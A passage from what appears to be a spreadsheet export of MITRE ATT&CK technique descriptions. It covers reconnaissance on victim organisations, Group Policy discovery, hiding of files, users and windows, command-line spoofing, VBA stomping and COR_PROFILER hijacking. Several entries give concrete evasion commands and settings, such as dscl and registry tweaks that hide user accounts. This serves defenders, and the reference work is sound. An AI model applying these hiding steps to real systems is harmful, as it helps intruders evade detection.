Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))</t>
  </si>
  <si>
    <t>Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path &lt;code&gt;\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\&lt;/code&gt;.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
Adversaries may use commands such as &lt;code&gt;gpresult&lt;/code&gt; or various publicly available PowerShell functions, such as &lt;code&gt;Get-DomainGPO&lt;/code&gt; and &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt;, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.</t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the &lt;code&gt;New-InboxRule&lt;/code&gt; or &lt;code&gt;Set-InboxRule&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.
Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as &lt;code&gt;malware&lt;/code&gt;, &lt;code&gt;suspicious&lt;/code&gt;, &lt;code&gt;phish&lt;/code&gt;, and &lt;code&gt;hack&lt;/code&gt;) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)</t>
  </si>
  <si>
    <t>Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (&lt;code&gt;dir /a&lt;/code&gt; for Windows and &lt;code&gt;ls –a&lt;/code&gt; for Linux and macOS).
On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.</t>
  </si>
  <si>
    <t>Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. 
In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value &lt;code&gt;Hide500Users&lt;/code&gt; to &lt;code&gt;TRUE&lt;/code&gt; in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the &lt;code&gt;Hide500Users&lt;/code&gt; key value is set to &lt;code&gt;TRUE&lt;/code&gt;, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the &lt;code&gt;dscl&lt;/code&gt; utility to create hidden user accounts by setting the &lt;code&gt;IsHidden&lt;/code&gt; attribute to &lt;code&gt;1&lt;/code&gt;. Adversaries can also hide a user’s home folder by changing the &lt;code&gt;chflags&lt;/code&gt; to hidden.(Citation: Apple Support Hide a User Account) 
Adversaries may similarly hide user accounts in Windows. Adversaries can set the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/code&gt; Registry key value to &lt;code&gt;0&lt;/code&gt; for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)
On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the &lt;code&gt;gsettings&lt;/code&gt; command (ex: &lt;code&gt;sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true&lt;/code&gt;).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.</t>
  </si>
  <si>
    <t>Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 
On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)</t>
  </si>
  <si>
    <t>Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) &lt;code&gt;WriteProcessMemory()&lt;/code&gt; function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)
Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)
This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.</t>
  </si>
  <si>
    <t>Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using &lt;code&gt;ls -l@&lt;/code&gt; or &lt;code&gt;xattr -l&lt;/code&gt; commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the &lt;code&gt;/Resources&lt;/code&gt; folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)</t>
  </si>
  <si>
    <t>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a &lt;code&gt;PerformanceCache&lt;/code&gt; that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.</t>
  </si>
  <si>
    <t>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</t>
  </si>
  <si>
